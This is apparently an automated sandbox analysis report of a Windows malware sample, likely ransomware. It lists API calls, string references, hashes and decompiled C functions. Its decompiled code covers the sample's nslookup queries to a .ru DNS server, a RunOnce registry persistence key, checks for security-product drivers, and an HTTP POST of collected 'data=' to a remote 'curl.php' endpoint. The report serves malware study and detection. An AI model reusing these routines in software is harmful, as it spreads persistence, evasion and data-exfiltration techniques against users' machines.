lstrcatW.KERNEL32(?,?), ref: 0F1D7051
lstrcatW.KERNEL32(?,0F1DFF50), ref: 0F1D7059
lstrcatW.KERNEL32(?,?), ref: 0F1D705F
lstrcatW.KERNEL32(?,0F1DFF54), ref: 0F1D7067
lstrcatW.KERNEL32(?,?), ref: 0F1D7073
lstrcatW.KERNEL32(?,0F1DFF50), ref: 0F1D707B
lstrcatW.KERNEL32(?,?), ref: 0F1D7081
lstrcatW.KERNEL32(?,0F1DFF54), ref: 0F1D7089
VirtualAlloc.KERNEL32(00000000,00000042,00003000,00000040,00000000,00000000,?,?,0F1D4699,00000000,?,00003000,00000040,00000000,?,00000000), ref: 0F1D709C
wsprintfW.USER32 ref: 0F1D70B6
wsprintfW.USER32 ref: 0F1D70C7
lstrcatW.KERNEL32(?,?), ref: 0F1D70D4
lstrcatW.KERNEL32(?,0F1DFF50), ref: 0F1D70DC
lstrcatW.KERNEL32(?,?), ref: 0F1D70E2
lstrcatW.KERNEL32(?,0F1DFF54), ref: 0F1D70EA
VirtualFree.KERNELBASE(?,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0F1D70F6
lstrcatW.KERNEL32(?,?), ref: 0F1D7106
lstrcatW.KERNEL32(?,0F1DFF50), ref: 0F1D710E
lstrcatW.KERNEL32(?,?), ref: 0F1D7114
lstrcatW.KERNEL32(?,0F1DFF54), ref: 0F1D711C
lstrlenW.KERNEL32(?,00000000,00000000,?,?,0F1D4699,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F1D711F

Strings

%x%x, xrefs: 0F1D70B0
undefined, xrefs: 0F1D70C1

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: lstrcat$Virtualwsprintf$AllocFreelstrlen
String ID: %x%x$undefined
API String ID: 3872469520-3801831566
Opcode ID: 2bc814177234d7da3a200daf12026a0586a7400279c42199bd2f4df1657f00d1
Instruction ID: 84d6f374884691173e74f4e4f9e4a004043ed1f94cc272fcf1eb9e30ebe170fc
Opcode Fuzzy Hash: 2bc814177234d7da3a200daf12026a0586a7400279c42199bd2f4df1657f00d1
Instruction Fuzzy Hash: B8514132146668B6DB2B3F61CC4DFDF3A39EF86700F050050FA152415B8B69A366DFA9

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D4E90 Relevance: 64.9, APIs: 8, Strings: 29, Instructions: 120
pipememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0F1D4E90(CHAR* __ecx, void* __edx, WCHAR* _a4) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				char _v64;
				short _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				char _v124;
				struct _SECURITY_ATTRIBUTES _v136;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				void* _t49;
				void* _t57;
				CHAR* _t64;
				void* _t66;

				_v64 = 0x73006e;
				_t57 = __edx;
				_v8 = 0;
				_t64 = __ecx;
				_v68 = 0;
				_v60 = 0x6f006c;
				_t43 =  !=  ?  &_v124 :  &_v64;
				_v56 = 0x6b006f;
				_a4 =  !=  ?  &_v124 :  &_v64;
				_v52 = 0x700075;
				_v48 = 0x250020;
				_v44 = 0x200053;
				_v40 = 0x6e0064;
				_v36 = 0x310073;
				_v32 = 0x73002e;
				_v28 = 0x70006f;
				_v24 = 0x6f0072;
				_v20 = 0x6e0064;
				_v16 = 0x2e0073;
				_v12 = 0x750072;
				_v124 = 0x73006e;
				_v120 = 0x6f006c;
				_v116 = 0x6b006f;
				_v112 = 0x700075;
				_v108 = 0x250020;
				_v104 = 0x200053;
				_v100 = 0x6e0064;
				_v96 = 0x320073;
				_v92 = 0x73002e;
				_v88 = 0x70006f;
				_v84 = 0x6f0072;
				_v80 = 0x6e0064;
				_v76 = 0x2e0073;
				_v72 = 0x750072;
				_v136.nLength = 0xc;
				_v136.bInheritHandle = 1;
				_v136.lpSecurityDescriptor = 0;
				_t45 = CreatePipe(0xf1e2a70, 0xf1e2a6c,  &_v136, 0); // executed
				if(_t45 != 0) {
					_t45 = SetHandleInformation( *0xf1e2a70, 1, 0);
					if(_t45 == 0) {
						goto L1;
					} else {
						CreatePipe(0xf1e2a68, 0xf1e2a74,  &_v136, 0); // executed
						_t45 = SetHandleInformation( *0xf1e2a74, 1, 0);
						if(_t45 == 0) {
							goto L1;
						} else {
							_t49 = VirtualAlloc(0, 0x2800, 0x3000, 4); // executed
							_t66 = _t49;
							if(_t66 == 0) {
								lstrcpyA(_t64, "fabian wosar <3");
								return 0;
							} else {
								wsprintfW(_t66, _a4, _t57);
								E0F1D4C40(_t66); // executed
								E0F1D4DE0(_t57, _t64, _t57, _t64, _t66); // executed
								VirtualFree(_t66, 0, 0x8000); // executed
								return 0;
							}
						}
					}
				} else {
					L1:
					return _t45 | 0xffffffff;
				}
			}

0x0f1d4e9d
0x0f1d4ea8
0x0f1d4eab
0x0f1d4eaf
0x0f1d4eb1
0x0f1d4ebb
0x0f1d4ec2
0x0f1d4ec5
0x0f1d4ece
0x0f1d4ee2
0x0f1d4ee9
0x0f1d4ef0
0x0f1d4ef7
0x0f1d4efe
0x0f1d4f05
0x0f1d4f0c
0x0f1d4f13
0x0f1d4f1a
0x0f1d4f21
0x0f1d4f28
0x0f1d4f2f
0x0f1d4f36
0x0f1d4f3d
0x0f1d4f44
0x0f1d4f4b
0x0f1d4f52
0x0f1d4f59
0x0f1d4f60
0x0f1d4f67
0x0f1d4f6e
0x0f1d4f75
0x0f1d4f7c
0x0f1d4f83
0x0f1d4f8a
0x0f1d4f91
0x0f1d4f9b
0x0f1d4fa2
0x0f1d4fa9
0x0f1d4fb1
0x0f1d4fcd
0x0f1d4fd1
0x00000000
0x0f1d4fd3
0x0f1d4fe6
0x0f1d4ff6
0x0f1d4ffa
0x00000000
0x0f1d4ffc
0x0f1d500a
0x0f1d5010
0x0f1d5014
0x0f1d5051
0x0f1d505f
0x0f1d5016
0x0f1d501b
0x0f1d5026
0x0f1d502f
0x0f1d503c
0x0f1d504a
0x0f1d504a
0x0f1d5014
0x0f1d4ffa
0x0f1d4fb3
0x0f1d4fb3
0x0f1d4fbc
0x0f1d4fbc

APIs

CreatePipe.KERNEL32(0F1E2A70,0F1E2A6C,?,00000000,00000001,00000001,00000000), ref: 0F1D4FA9
SetHandleInformation.KERNEL32(00000001,00000000), ref: 0F1D4FCD
CreatePipe.KERNEL32(0F1E2A68,0F1E2A74,0000000C,00000000), ref: 0F1D4FE6
SetHandleInformation.KERNEL32(00000001,00000000), ref: 0F1D4FF6
VirtualAlloc.KERNEL32(00000000,00002800,00003000,00000004), ref: 0F1D500A
wsprintfW.USER32 ref: 0F1D501B
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F1D503C

Strings

u, xrefs: 0F1D4EE2
s, xrefs: 0F1D4F83
o, xrefs: 0F1D4F6E
n, xrefs: 0F1D4E9D
s, xrefs: 0F1D4F60
o, xrefs: 0F1D4F3D
l, xrefs: 0F1D4F36
d, xrefs: 0F1D4F7C
d, xrefs: 0F1D4F59
S, xrefs: 0F1D4EF0
o, xrefs: 0F1D4F0C
d, xrefs: 0F1D4F1A
S, xrefs: 0F1D4F52
u, xrefs: 0F1D4F44
r, xrefs: 0F1D4F28
s, xrefs: 0F1D4EFE
o, xrefs: 0F1D4EC5
r, xrefs: 0F1D4F13
fabian wosar <3, xrefs: 0F1D504B
r, xrefs: 0F1D4F8A
., xrefs: 0F1D4F05
d, xrefs: 0F1D4EF7
s, xrefs: 0F1D4F21
l, xrefs: 0F1D4EBB
r, xrefs: 0F1D4F75
., xrefs: 0F1D4F67
, xrefs: 0F1D4F4B
n, xrefs: 0F1D4F2F
, xrefs: 0F1D4EE9

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: CreateHandleInformationPipeVirtual$AllocFreewsprintf
String ID: $ $.$.$S$S$d$d$d$d$fabian wosar <3$l$l$n$n$o$o$o$o$r$r$r$r$s$s$s$s$u$u
API String ID: 1490407255-3453122116
Opcode ID: ecd9266279dc9084a74c86f2aa8f52e1d9d1156e3f76bb8e59e491619e523805
Instruction ID: 633c247e938dacb2a91fb9a4a503a0db10e799367dc981752acc47ffa5ea686f
Opcode Fuzzy Hash: ecd9266279dc9084a74c86f2aa8f52e1d9d1156e3f76bb8e59e491619e523805
Instruction Fuzzy Hash: 16417D70E41318ABEB20CF90E8487EDBFB5FF44759F104129E504AA292CBFA05988F94

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D2960 Relevance: 61.3, APIs: 5, Strings: 30, Instructions: 87
registrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E0F1D2960(WCHAR* __ecx, void* __eflags) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				short _v32;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				short _v140;
				long _t45;
				WCHAR* _t58;

				_t58 = __ecx;
				_v32 = 0x520050;
				_v28 = 0x440049;
				_push(0x41);
				_v24 = 0x520055;
				_v20 = 0x530041;
				_v16 = 0x4b0048;
				_v12 = 0x41;
				E0F1D8150( &_v32, lstrlenW( &_v32)); // executed
				_v140 = 0x4f0053;
				_v136 = 0x540046;
				_v132 = 0x410057;
				_v128 = 0x450052;
				_v124 = 0x4d005c;
				_v120 = 0x630069;
				_v116 = 0x6f0072;
				_v112 = 0x6f0073;
				_v108 = 0x740066;
				_v104 = 0x57005c;
				_v100 = 0x6e0069;
				_v96 = 0x6f0064;
				_v92 = 0x730077;
				_v88 = 0x43005c;
				_v84 = 0x720075;
				_v80 = 0x650072;
				_v76 = 0x74006e;
				_v72 = 0x650056;
				_v68 = 0x730072;
				_v64 = 0x6f0069;
				_v60 = 0x5c006e;
				_v56 = 0x750052;
				_v52 = 0x4f006e;
				_v48 = 0x63006e;
				_v44 = 0x65;
				_t45 = RegCreateKeyExW(0x80000001,  &_v140, 0, 0, 0, 0xf003f, 0,  &_v8, 0); // executed
				if(_t45 != 0) {
					return 0;
				} else {
					RegSetValueExW(_v8,  &_v32, 0, 1, _t58, lstrlenW(_t58) + _t47); // executed
					asm("sbb esi, esi"); // executed
					RegCloseKey(_v8);
					_t39 =  &(_t58[0]); // 0x1
					return _t39;
				}
			}

0x0f1d296b
0x0f1d296d
0x0f1d2979
0x0f1d2980
0x0f1d2984
0x0f1d298c
0x0f1d2993
0x0f1d299a
0x0f1d29a8
0x0f1d29b0
0x0f1d29bd
0x0f1d29c7
0x0f1d29ce
0x0f1d29eb
0x0f1d29f8
0x0f1d29ff
0x0f1d2a06
0x0f1d2a0d
0x0f1d2a14
0x0f1d2a1b
0x0f1d2a22
0x0f1d2a29
0x0f1d2a30
0x0f1d2a37
0x0f1d2a3e
0x0f1d2a45
0x0f1d2a4c
0x0f1d2a53
0x0f1d2a5a
0x0f1d2a61
0x0f1d2a68
0x0f1d2a6f
0x0f1d2a76
0x0f1d2a7d
0x0f1d2a84
0x0f1d2a8c
0x0f1d2ac7
0x0f1d2a8e
0x0f1d2aa4
0x0f1d2aaf
0x0f1d2ab1
0x0f1d2ab7
0x0f1d2abf
0x0f1d2abf

APIs

lstrlenW.KERNEL32(00520050,00000041,772D82B0,00000000), ref: 0F1D299D

Part of subcall function 0F1D8150: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000001,F0000000,00000000,00000000,00000000), ref: 0F1D816D
Part of subcall function 0F1D8150: VirtualAlloc.KERNEL32(00000000,00000001,00003000,00000040), ref: 0F1D819B
Part of subcall function 0F1D8150: GetModuleHandleA.KERNEL32(?), ref: 0F1D81EF
Part of subcall function 0F1D8150: LoadLibraryA.KERNEL32(Advapi32.dll), ref: 0F1D81FD
Part of subcall function 0F1D8150: GetProcAddress.KERNEL32(00000000,CryptGenRandomAdvapi32.dll), ref: 0F1D820C
Part of subcall function 0F1D8150: CryptReleaseContext.ADVAPI32(?,00000000), ref: 0F1D8255
Part of subcall function 0F1D8150: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F1D8263

RegCreateKeyExW.KERNEL32(80000001,004F0053,00000000,00000000,00000000,000F003F,00000000,0F1D2C45,00000000), ref: 0F1D2A84
lstrlenW.KERNEL32(00000000), ref: 0F1D2A8F
RegSetValueExW.KERNEL32(0F1D2C45,00520050,00000000,00000001,00000000,00000000), ref: 0F1D2AA4
RegCloseKey.KERNEL32(0F1D2C45), ref: 0F1D2AB1

Strings

\, xrefs: 0F1D2A14
e, xrefs: 0F1D2A7D
P, xrefs: 0F1D296D
s, xrefs: 0F1D2A06
A, xrefs: 0F1D298C
I, xrefs: 0F1D2979
n, xrefs: 0F1D2A6F
r, xrefs: 0F1D2A53
H, xrefs: 0F1D2993
r, xrefs: 0F1D29FF
i, xrefs: 0F1D29F8
r, xrefs: 0F1D2A3E
W, xrefs: 0F1D29C7
i, xrefs: 0F1D2A1B
w, xrefs: 0F1D2A29
R, xrefs: 0F1D29CE
\, xrefs: 0F1D29EB
U, xrefs: 0F1D2984
f, xrefs: 0F1D2A0D
R, xrefs: 0F1D2A68
n, xrefs: 0F1D2A61
n, xrefs: 0F1D2A45
F, xrefs: 0F1D29BD
u, xrefs: 0F1D2A37
\, xrefs: 0F1D2A30
S, xrefs: 0F1D29B0
d, xrefs: 0F1D2A22
i, xrefs: 0F1D2A5A
n, xrefs: 0F1D2A76
V, xrefs: 0F1D2A4C

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: ContextCryptVirtuallstrlen$AcquireAddressAllocCloseCreateFreeHandleLibraryLoadModuleProcReleaseValue
String ID: A$F$H$I$P$R$R$S$U$V$W$\$\$\$d$e$f$i$i$i$n$n$n$n$r$r$r$s$u$w
API String ID: 553367697-3791882466
Opcode ID: 127ebb0f03e318a4fcf56dfd88e7ecf5914a330169ebd75524da649ce2fc671f
Instruction ID: 44dc1469f09911136ff7716fc9168d3508f4e4c20af902e413c2fc17dbcfc9fc
Opcode Fuzzy Hash: 127ebb0f03e318a4fcf56dfd88e7ecf5914a330169ebd75524da649ce2fc671f
Instruction Fuzzy Hash: 0931ECB090121DDFEB20CF91E948BEDBFB9FB01709F108159E5186A282D7BA5958CF94

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D2D30 Relevance: 54.4, APIs: 19, Strings: 12, Instructions: 137
windowthreadregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 85%

			E0F1D2D30() {
				struct _WNDCLASSEXW _v52;
				struct tagMSG _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				char _v96;
				void* _t37;
				short _t42;
				void* _t49;
				void* _t59;
				void* _t60;
				void* _t61;
				void* _t62;
				void* _t67;
				void* _t69;
				long _t71;

				_push(_t62);
				_push(_t69);
				_v84.message = 0x6c006b;
				_push(_t67);
				_v84.wParam = 0x660069;
				_v84.lParam = 0x73002e;
				_v84.time = 0x730079;
				_v84.pt = 0;
				_v96 = 0x6c006b;
				_v92 = 0x2e0031;
				_v88 = 0x790073;
				_v84.hwnd = 0x73;
				_t37 = E0F1D2F50( &(_v84.message)); // executed
				if(_t37 != 0) {
					L5:
					_v52.cbSize = 0x30;
					_v52.style = 3;
					_v52.lpfnWndProc = E0F1D2C50;
					_v52.cbClsExtra = 0;
					_v52.cbWndExtra = 0;
					_v52.hInstance = GetModuleHandleW(0);
					_v52.hIcon = 0;
					_v52.hCursor = LoadCursorW(0, 0x7f00);
					_v52.hbrBackground = 6;
					_v52.lpszMenuName = 0;
					_v52.lpszClassName = L"win32app";
					_v52.hIconSm = LoadIconW(_v52.hInstance, 0x7f00);
					_t42 = RegisterClassExW( &_v52);
					_push(0);
					if(_t42 != 0) {
						GetModuleHandleW();
						_t71 = CreateWindowExW(0, L"win32app", L"firefox", 0xcf0000, 0x80000000, 0x80000000, 5, 5, 0, 0, GetModuleHandleW(0), 0);
						SetWindowLongW(_t71, 0xfffffff0, 0);
						if(_t71 != 0) {
							ShowWindow(_t71, 5);
							UpdateWindow(_t71);
							_t49 = CreateThread(0, 0, E0F1D2D10, _t71, 0, 0);
							if(_t49 != 0) {
								CloseHandle(_t49);
							}
							if(GetMessageW( &_v84, 0, 0, 0) == 0) {
								L15:
								ExitThread(0);
							} else {
								do {
									TranslateMessage( &_v84);
								} while (DispatchMessageW( &_v84) != 0xdeadbeef && GetMessageW( &_v84, 0, 0, 0) != 0);
								goto L15;
							}
						}
						ExitThread(_t71);
					}
					ExitThread();
				}
				_t59 = E0F1D2F50( &_v96); // executed
				if(_t59 != 0) {
					goto L5;
				}
				_v84.message = 0x730066;
				_v84.wParam = 0x660064;
				_v84.lParam = 0x2e0077;
				_v84.time = 0x790073;
				_v84.pt = 0x73;
				_t60 = E0F1D2F50( &(_v84.message)); // executed
				if(_t60 != 0) {
					goto L15;
				}
				_t61 = E0F1D30A0(_t62, _t67, _t69); // executed
				if(_t61 != 0) {
					goto L15;
				}
				_push(_t61); // executed
				E0F1D2AD0(); // executed
				goto L5;
			}

0x0f1d2d39
0x0f1d2d3a
0x0f1d2d3d
0x0f1d2d45
0x0f1d2d4a
0x0f1d2d52
0x0f1d2d5a
0x0f1d2d62
0x0f1d2d67
0x0f1d2d6f
0x0f1d2d77
0x0f1d2d7f
0x0f1d2d87
0x0f1d2d8e
0x0f1d2de9
0x0f1d2df1
0x0f1d2df9
0x0f1d2e01
0x0f1d2e09
0x0f1d2e11
0x0f1d2e22
0x0f1d2e26
0x0f1d2e3d
0x0f1d2e41
0x0f1d2e49
0x0f1d2e51
0x0f1d2e5f
0x0f1d2e68
0x0f1d2e6e
0x0f1d2e73
0x0f1d2e7b
0x0f1d2eaf
0x0f1d2eb4
0x0f1d2ebc
0x0f1d2ec8
0x0f1d2ecf
0x0f1d2ee3
0x0f1d2eeb
0x0f1d2eee
0x0f1d2eee
0x0f1d2f09
0x0f1d2f3d
0x0f1d2f3f
0x0f1d2f0b
0x0f1d2f17
0x0f1d2f1c
0x0f1d2f25
0x00000000
0x0f1d2f17
0x0f1d2f09
0x0f1d2ebf
0x0f1d2ebf
0x0f1d2e75
0x0f1d2e75
0x0f1d2d94
0x0f1d2d9b
0x00000000
0x00000000
0x0f1d2da1
0x0f1d2da9
0x0f1d2db1
0x0f1d2db9
0x0f1d2dc1
0x0f1d2dc9
0x0f1d2dd0
0x00000000
0x00000000
0x0f1d2dd6
0x0f1d2ddd
0x00000000
0x00000000
0x0f1d2de3
0x0f1d2de4
0x00000000

APIs

Part of subcall function 0F1D2F50: K32EnumDeviceDrivers.KERNEL32(?,00000004,?), ref: 0F1D2F74

GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,00000000), ref: 0F1D2E19
LoadCursorW.USER32(00000000,00007F00), ref: 0F1D2E2E
LoadIconW.USER32 ref: 0F1D2E59
RegisterClassExW.USER32 ref: 0F1D2E68
ExitThread.KERNEL32 ref: 0F1D2E75

Part of subcall function 0F1D2F50: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 0F1D2F8D

GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 0F1D2E7B
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,?,?,?,?,00007F00), ref: 0F1D2E81
CreateWindowExW.USER32 ref: 0F1D2EA7
SetWindowLongW.USER32 ref: 0F1D2EB4
ExitThread.KERNEL32 ref: 0F1D2EBF

Part of subcall function 0F1D2F50: K32EnumDeviceDrivers.KERNEL32(00000000,00000000,?), ref: 0F1D2FA8
Part of subcall function 0F1D2F50: K32GetDeviceDriverBaseNameW.KERNEL32(00000000,?,00000400), ref: 0F1D2FCF
Part of subcall function 0F1D2F50: lstrcmpiW.KERNEL32(?,006C006B), ref: 0F1D2FE3
Part of subcall function 0F1D2F50: VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 0F1D2FFA

ExitThread.KERNEL32 ref: 0F1D2F3F

Part of subcall function 0F1D2AD0: VirtualAlloc.KERNEL32(00000000,00000800,00003000,00000040), ref: 0F1D2AEA
Part of subcall function 0F1D2AD0: GetModuleFileNameW.KERNEL32(00000000,00000000,00000100), ref: 0F1D2B2C
Part of subcall function 0F1D2AD0: GetTempPathW.KERNEL32(00000100,00000000), ref: 0F1D2B38
Part of subcall function 0F1D2AD0: ExitThread.KERNEL32 ref: 0F1D2C47

ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,00007F00), ref: 0F1D2EC8
UpdateWindow.USER32(00000000), ref: 0F1D2ECF
CreateThread.KERNEL32 ref: 0F1D2EE3
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,00007F00), ref: 0F1D2EEE
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0F1D2F05
TranslateMessage.USER32(?), ref: 0F1D2F1C
DispatchMessageW.USER32 ref: 0F1D2F23
GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0F1D2F37

Strings

win32app, xrefs: 0F1D2E51, 0F1D2EA0
d, xrefs: 0F1D2DA9
0, xrefs: 0F1D2DF1
1, xrefs: 0F1D2D6F
k, xrefs: 0F1D2D67
s, xrefs: 0F1D2DB9
firefox, xrefs: 0F1D2E9B
w, xrefs: 0F1D2DB1
s, xrefs: 0F1D2DC1
s, xrefs: 0F1D2D77
f, xrefs: 0F1D2DA1
s, xrefs: 0F1D2D7F

Memory Dump Source

Source File: 00000000.00000002.517613464.000000000F1D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F1D0000, based on PE: true

Associated: 00000000.00000002.517605591.000000000F1D0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517623653.000000000F1DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517637468.000000000F1E2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.517644878.000000000F1E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f1d0000_O8ZHhytWhn.jbxd

Yara matches

Similarity

API ID: Thread$ExitHandleMessageModuleWindow$DeviceVirtual$AllocCreateDriversEnumLoadName$BaseClassCloseCursorDispatchDriverFileFreeIconLongPathRegisterShowTempTranslateUpdatelstrcmpi
String ID: 0$1$d$f$firefox$k$s$s$s$s$w$win32app
API String ID: 3011903443-520298170
Opcode ID: 4fac8c707ea28b69880614782f3a62f76eb23b76cf72d6ebce755e62035f3ff1
Instruction ID: e259d82e2d8a51b854087ac6dbe1349b1b93191d5a744da3fd984b9f52e2ea48
Opcode Fuzzy Hash: 4fac8c707ea28b69880614782f3a62f76eb23b76cf72d6ebce755e62035f3ff1
Instruction Fuzzy Hash: A8518E7014A341AFE310DF60CC09B4B7BF8AF44B55F10490CF694AA1C2E7B9E159CB96

Uniqueness

Uniqueness Score: -1.00%

Function 0F1D54A0 Relevance: 29.9, APIs: 14, Strings: 3, Instructions: 136
stringmemorynetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 35%

			E0F1D54A0(CHAR* __ecx, CHAR** __edx, intOrPtr _a4) {
				CHAR* _v12;
				void* _v16;
				CHAR** _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				char _v36;
				short _v136;
				char _v1156;
				short _v1160;
				void* _t31;
				int _t45;
				void* _t53;
				CHAR* _t57;
				CHAR* _t59;
				CHAR* _t60;
				void* _t61;
				void* _t70;
				short _t71;

				_t59 = __ecx;
				_v20 = __edx;
				_v12 = __ecx;
				E0F1D7CE0( &_v36); // executed
				_t31 = E0F1D5060(); // executed
				_v24 = _t31;
				_t70 = 0x400 + lstrlenA(_t59) * 2;
				_t7 = _t70 + 1; // 0x77296981
				_t60 = VirtualAlloc(0, _t7, 0x3000, 0x40);
				_v28 = _t60;
				_v16 = VirtualAlloc(0, 0x32001, 0x3000, 0x40);
				if(_t60 == 0) {
					L2:
					_t60 = 0;
					L3:
					lstrcatA(_t60, "data=");
					lstrcatA(_t60, _v12);
					asm("movdqu xmm0, [0xf1dfb20]");
					asm("movdqu [ebp-0x84], xmm0");
					asm("movdqu xmm0, [0xf1dfb30]");
					asm("movdqu [ebp-0x74], xmm0");
					asm("movdqu xmm0, [0xf1dfb40]");
					asm("movdqu [ebp-0x64], xmm0");
					asm("movdqu xmm0, [0xf1dfb50]");
					asm("movdqu [ebp-0x54], xmm0");
					asm("movdqu xmm0, [0xf1dfb60]");
					asm("movdqu [ebp-0x44], xmm0");
					asm("movdqu xmm0, [0xf1dfb70]");
					asm("movdqu [ebp-0x34], xmm0");
					lstrlenA(_t60);
					_t71 = 0;
					_v1160 = 0;
					E0F1D9010( &_v1156, 0, 0x3fc);
					lstrcpyW( &_v1160, L"curl.php?token=");
					E0F1D53A0( &_v1160);
					_t45 = lstrlenW( &_v136);
					_t74 = _v16;
					_push(_t45);
					_push( &_v136);
					_push(L"POST");
					_push(0x31fff);
					_push(_v16);
					_push(lstrlenA(_t60));
					_push(_t60);
					_t61 = _v24;
					_push( &_v1160);
					_push(_t61);
					if(E0F1D7EF0( &_v36) != 0) {
						_t71 = 1;
						if(_a4 != 0) {
							_v12 = 0;
							if(E0F1D5210(_t74,  &_v12) == 0) {
								_t71 = 0;
							} else {
								_t57 = _v12;
								if(_t57 != 0) {
									 *_v20 = _t57;
								}
							}
						}
					}
					VirtualFree(_t61, 0, 0x8000);
					VirtualFree(_v16, 0, 0x8000);
					VirtualFree(_v28, 0, 0x8000);
					_t53 = _v32;
					if(_t53 != 0) {
						InternetCloseHandle(_t53);
					}
					return _t71;
				}
				_t10 = _t70 + 1; // 0x77296981
				if(_t70 < _t10) {
					goto L3;
				}
				goto L2;
			}

0x0f1d54ab
0x0f1d54ad
0x0f1d54b4
0x0f1d54b7
0x0f1d54bc
0x0f1d54c2
0x0f1d54d8
0x0f1d54df
0x0f1d54f3
0x0f1d54f7
0x0f1d54fc
0x0f1d5501
0x0f1d550a
0x0f1d550a
0x0f1d550c
0x0f1d5518
0x0f1d551e
0x0f1d5520
0x0f1d5529
0x0f1d5531
0x0f1d5539
0x0f1d553e
0x0f1d5546
0x0f1d554b
0x0f1d5553
0x0f1d5558
0x0f1d5560
0x0f1d5565
0x0f1d556d
0x0f1d5572
0x0f1d5578
0x0f1d5587
0x0f1d558d
0x0f1d55a1
0x0f1d55ad
0x0f1d55b9
0x0f1d55bf
0x0f1d55c2
0x0f1d55c9
0x0f1d55ca
0x0f1d55d2
0x0f1d55d7
0x0f1d55df
0x0f1d55e0
0x0f1d55e1
0x0f1d55ea
0x0f1d55eb
0x0f1d55f6
0x0f1d55fc
0x0f1d5601
0x0f1d5606
0x0f1d5616
0x0f1d5626
0x0f1d5618
0x0f1d5618
0x0f1d561d
0x0f1d5622
0x0f1d5622
0x0f1d561d
0x0f1d5616
0x0f1d5601
